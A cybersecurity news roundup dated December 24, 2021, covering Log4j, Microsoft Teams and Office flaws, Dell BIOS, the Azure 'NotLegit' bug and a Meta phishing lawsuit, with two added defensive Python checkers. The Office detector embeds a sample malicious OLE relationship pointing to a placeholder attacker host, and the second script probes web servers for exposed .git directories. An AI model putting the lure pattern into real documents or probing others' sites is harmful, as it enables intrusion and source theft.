Cyber Security Headlines – December 24, 2021

CISA releases free scanner to spot Log4j exposure

CISA posted the Log4j Scanner to GitHub yesterday, describing it as a “project derived from other members of the open-source community” and designed to help find vulnerable web services affected by the two flaws in the popular logging tool. CISA said the scanning tool would only help security teams “look for a limited set of currently known vulnerabilities in assets owned by their organization.” It warned that there may be “as yet unknown” ways for threat actors to leverage the vulnerabilities and said it is continuing to monitor community chatter to ensure its advice stays current.

(InfoSecurity)

Researchers disclose unpatched vulnerabilities in Microsoft Teams software

Microsoft said it will not fix, or will defer patching, three of the four security flaws uncovered in its Teams business communication platform in March. The disclosure comes from Berlin-based cybersecurity firm Positive Security, which found that the implementation of the link preview feature was susceptible to a number of issues that could “allow accessing internal Microsoft services, spoofing the link preview, and, for Android users, leaking their IP address, and imposing Denial of Service on their Teams app/channels.” Of the four vulnerabilities, Microsoft is said to have addressed only the IP address leakage from Android devices. A fix for the denial-of-service (DoS) flaw will be considered in a future version of the product.

(The Hacker News)

Microsoft Office patch bypassed for malware distribution in apparent ‘dry run’

Cybercriminals have found a way to bypass the patch for a recent Microsoft Office vulnerability and leveraged it to briefly distribute Formbook malware, according to Sophos. Tracked as CVE-2021-40444, the security defect can be exploited to achieve remote code execution on vulnerable systems. Publicly disclosed on September 7, after attacks exploiting it were identified, the flaw was addressed with the September 2021 Patch Tuesday updates. Proof-of-concept code targeting the bug was also published, and exploitation activity intensified. The patch Microsoft provided was meant to block the code path that downloaded a Microsoft Cabinet (CAB) archive containing a malicious executable. However, attackers appear to have sidestepped the patch by packaging a Word document inside a specially crafted RAR archive. Sophos says the attackers distributed the archives in a spam email campaign that lasted roughly 36 hours, on October 24 and 25, before disappearing completely, which suggests the attack was only a “dry run” experiment.

(Security Week)
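The item above does not describe the document internals, but one fact about CVE-2021-40444 is well established: the lure is an OOXML document whose relationship file points an oleObject at an external mhtml: URL rather than at an embedded part. The Python below is an added example written for this page (it is not Sophos’s or Microsoft’s code) that opens a .docx, walks every .rels part, and reports OLE relationships with an External target or any mhtml: target. The two sample documents are constructed in memory so the check runs offline, and the attacker.invalid hostname is a placeholder. It reads .docx (zip) files only; RAR wrappers like the one in the story need a separate unpack step first.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# OOXML package relationship namespace and the relationship type Word uses for OLE objects.
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"


def find_external_ole_relationships(docx_bytes):
    """Return every relationship in a .docx whose target is External and is
    either an oleObject relationship or an mhtml: URL. Legitimate documents
    keep OLE objects as internal parts, so any hit deserves a closer look."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            try:
                root = ET.fromstring(zf.read(name))
            except ET.ParseError:
                continue  # malformed part; out of scope for this check
            for rel in root.iter("{%s}Relationship" % REL_NS):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                target = rel.get("Target", "")
                rtype = rel.get("Type", "")
                scheme = target.split(":", 1)[0].lower() if ":" in target else ""
                if rtype == OLE_REL_TYPE or scheme == "mhtml":
                    findings.append({
                        "part": name,
                        "id": rel.get("Id"),
                        "type": rtype.rsplit("/", 1)[-1],
                        "target": target,
                    })
    return findings


def build_minimal_docx(rels_xml):
    """Constructed sample: the smallest zip layout the checker needs to see.
    Real documents carry many more parts; only the .rels files matter here."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


# Constructed sample 1: an ordinary internal image relationship.
SAMPLE_BENIGN = build_minimal_docx(
    '<Relationships xmlns="%s">'
    '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/>'
    '</Relationships>' % REL_NS
)

# Constructed sample 2: an oleObject relationship whose External target is an
# mhtml: URL, the shape of the CVE-2021-40444 lure. The host is a placeholder.
SAMPLE_SUSPICIOUS = build_minimal_docx(
    '<Relationships xmlns="%s">'
    '<Relationship Id="rId5" Type="%s" Target="mhtml:http://attacker.invalid/lure.html!x-usc:http://attacker.invalid/lure.html" TargetMode="External"/>'
    '</Relationships>' % (REL_NS, OLE_REL_TYPE)
)

if __name__ == "__main__":
    for label, sample in (("benign", SAMPLE_BENIGN), ("suspicious", SAMPLE_SUSPICIOUS)):
        print(label, find_external_ole_relationships(sample))
```

Flagging on the relationship rather than on a specific URL is deliberate: the patch bypass in the story changed the delivery wrapper, not the fact that the document reaches out to an external OLE target, so the check keeps working when the hostname or the outer archive changes.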

New Dell BIOS updates cause laptops and desktops not to boot

Recently released Dell BIOS updates are reportedly causing serious boot problems on multiple laptop and desktop models, including the Latitude 5320 and 5520 laptops as well as the Inspiron 5680 and Alienware Aurora R8 desktops. Customer reports shared on social media warn that the latest BIOS versions (1.14.3 for the Latitude laptops, 2.8.0 for the Inspiron, and 1.0.18 for the Aurora R8) cause boot failures, including going straight to a blue screen and shutting down. Until Dell releases an update that addresses the boot failures, experts recommend downgrading to a previous firmware version where possible.

(Bleeping Computer)

Thanks to our episode sponsor, Lookout

Is 2022 the beginning of the end for on-prem security? Two years after remote work became the norm, we’re at an inflection point for both threats and security solutions. Just as you wouldn’t bring a sword to a gunfight, organizations need to take advantage of integrated cloud solutions to tackle emerging challenges. Check out Lookout’s 2022 predictions at lookout.com/predictions.

Why CISOs shouldn’t report to CIOs

An opinion piece written by Eric Jeffery, Senior Solutions Architect at IBM, and posted at SecurityIntelligence.com suggests that CISOs should no longer report to CIOs but should instead have their own seat at the executive table. He writes, “we are at a crossroads today where we need to move security out from under IT and treat it as a business risk rather than a technical problem.” According to the IBM Cost of a Data Breach study, it takes an average of 287 days to identify and contain a data breach, a number that illustrates how vulnerable businesses are. He adds that inherent tension between CISOs and others who report to the CIO frequently arises from the trade-off between security and efficiency, which affects business units throughout an enterprise. The full article is available at securityintelligence.com/posts.

(Security Intelligence)

4-year-old bug in Azure app service exposed hundreds of source code repositories

A security flaw has been unearthed in Microsoft’s Azure App Service that exposed the source code of customer applications written in Java, Node, PHP, Python, and Ruby for at least four years, since September 2017. The vulnerability, codenamed “NotLegit,” was reported to the tech giant by Wiz researchers on October 7, 2021, and Microsoft mitigated the information-disclosure bug in November. Microsoft said a “limited subset of customers” are at risk, adding, “Customers who deployed code to App Service Linux via Local Git after files were already created in the application were the only impacted customers.”

(The Hacker News)
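The blurb does not say how the source code was exposed; the mechanism Wiz published is that a Local Git deployment left the repository’s .git directory inside the web root, where it was served over HTTP like any other file. The Python below is an added example for this page (not Wiz’s or Microsoft’s tooling) that a practitioner can run against their own apps to confirm the fix: it requests /.git/HEAD and /.git/config and reports a hit only when the body actually parses as git metadata, so a site that answers every path with an HTTP 200 and its HTML shell (common for single-page apps) is not a false positive. The hostnames exposed.example, spa.example and clean.example are placeholders, and the responses for them are constructed in-line so the check runs offline; http_fetch is the fetcher to pass in for real use.

```python
import re
import urllib.error
import urllib.request

# A real .git/HEAD is a single line: "ref: refs/heads/<branch>", or a bare
# 40-hex commit id when HEAD is detached.
GIT_HEAD_RE = re.compile(r"^(ref: refs/heads/[\w./-]+|[0-9a-f]{40})$")
PROBE_PATHS = ("/.git/HEAD", "/.git/config")


def looks_like_git_head(body):
    return bool(GIT_HEAD_RE.match(body.strip()))


def looks_like_git_config(body):
    # git's config file is INI-style and always carries a [core] section
    # with repositoryformatversion.
    return "[core]" in body and "repositoryformatversion" in body


def check_git_exposure(base_url, fetch):
    """Probe base_url for a web-readable .git directory.

    `fetch(url)` must return (status_code, body_text). It is injected so the
    check can be exercised against the constructed fake below; pass
    http_fetch for a real target. Returns the list of exposed paths."""
    exposed = []
    for path in PROBE_PATHS:
        status, body = fetch(base_url.rstrip("/") + path)
        if status != 200:
            continue
        if path.endswith("/HEAD") and looks_like_git_head(body):
            exposed.append(path)
        elif path.endswith("/config") and looks_like_git_config(body):
            exposed.append(path)
    return exposed


def http_fetch(url, timeout=5):
    """Fetcher for real use; not exercised by the offline sample."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.getcode(), resp.read(4096).decode("utf-8", "replace")
    except urllib.error.HTTPError as exc:
        return exc.code, ""
    except (urllib.error.URLError, OSError):
        return 0, ""


# Constructed responses standing in for two hypothetical apps.
FAKE_RESPONSES = {
    # App that shipped its .git directory into the web root.
    "https://exposed.example/.git/HEAD": (200, "ref: refs/heads/master\n"),
    "https://exposed.example/.git/config": (
        200, "[core]\n\trepositoryformatversion = 0\n\tbare = false\n"),
    # App whose catch-all route returns the SPA shell for any path.
    "https://spa.example/.git/HEAD": (200, "<!doctype html><html><body>app</body></html>"),
    "https://spa.example/.git/config": (200, "<!doctype html><html><body>app</body></html>"),
}


def fake_fetch(url):
    return FAKE_RESPONSES.get(url, (404, ""))


if __name__ == "__main__":
    for site in ("https://exposed.example", "https://spa.example", "https://clean.example"):
        print(site, check_git_exposure(site, fake_fetch))
```

A readable .git/HEAD is enough to reconstruct the repository from the object store, so treat any hit as full source disclosure, not a minor information leak, and check the deployment history as well as the current build.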

Meta (Facebook) sues operators of 39,000 phishing sites

Meta, the parent company of Facebook, Instagram, and WhatsApp, has filed a lawsuit in a California court against the operators of more than 39,000 phishing sites that were hosted through the Ngrok service. The company is seeking a court injunction and damages of at least $500,000 from the operators of these sites, even before they are identified, according to court documents obtained by The Record. The lawsuit alleges that the group built the phishing sites on their own local systems and then used Ngrok, a localhost-to-internet relay service that lets developers expose local sites under the ngrok.io domain, to publish them. The group then spread links to these ngrok.io domains to victims and collected their account credentials.

(The Record)

Fisher Price’s Bluetooth reboot of pre-school play phone has privacy flaw

The Fisher Price Chatter Special Edition, a Bluetooth replica of the brightly colored plastic phone you likely played with as a child, has been found to threaten the very adult prospect of being surveilled in your home. The phone, which we first reported on in September, adds Bluetooth and a speaker to the smiling, brightly colored, wheeled, rotary-dial phone. It connects to a smartphone and can be used to make real calls. Unfortunately, according to Pen Test Partners, the Chatter uses Bluetooth Classic without secure pairing, which means it accepts any pairing request. Anyone within range could therefore connect a Bluetooth device and listen in on whatever is said within range of the Chatter’s microphone.

(The Register)